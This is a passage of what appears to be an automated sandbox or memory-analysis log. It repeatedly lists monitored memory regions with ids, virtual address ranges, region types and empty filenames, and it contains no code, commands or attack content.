0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20245 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20246 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20247 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20248 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20249 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 20250 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20251 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20252 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20253 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20254 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20255 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20256 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20257 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20258 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20259 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20260 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20261 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20262 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20263 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20264 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20265 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20266 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20267 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20268 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20269 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20270 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20271 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20272 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20273 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20274 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20275 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20276 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20277 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20278 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20279 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20280 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20281 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20282 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20283 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20284 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20285 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20286 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20287 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20288 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20289 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20290 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20291 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20292 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 20293 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20294 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20295 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20296 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20297 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20298 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20299 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20300 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20301 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20302 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20303 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20304 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20305 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20306 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20307 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20308 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20309 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20310 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20311 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20312 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20313 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20314 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20315 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20316 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20317 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20318 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20319 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20320 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20321 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20322 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20323 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20324 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20325 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20326 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20327 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20328 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20329 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20330 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20331 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20332 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20333 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20334 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20335 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20336 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20337 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20338 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20339 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20340 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20341 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20342 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20343 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20344 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20345 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20346 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20347 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20348 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20349 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20350 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20351 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20352 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20353 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20354 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20355 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20356 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20357 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 20358 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20359 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20360 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20361 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20362 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20363 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20364 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20365 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20366 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20367 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20368 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20369 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20370 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20371 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20372 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20373 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20374 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20375 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20376 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20377 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20378 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20379 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20380 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20381 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20382 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20383 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20384 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20385 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20386 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20387 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20388 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20389 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20390 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20391 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20392 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20393 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20394 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20395 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20396 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20397 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20398 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20399 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20400 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20401 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20402 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20403 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 20404 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20405 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20406 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20407 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20408 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20409 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20410 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20411 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20412 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20413 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20414 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20415 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20416 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" 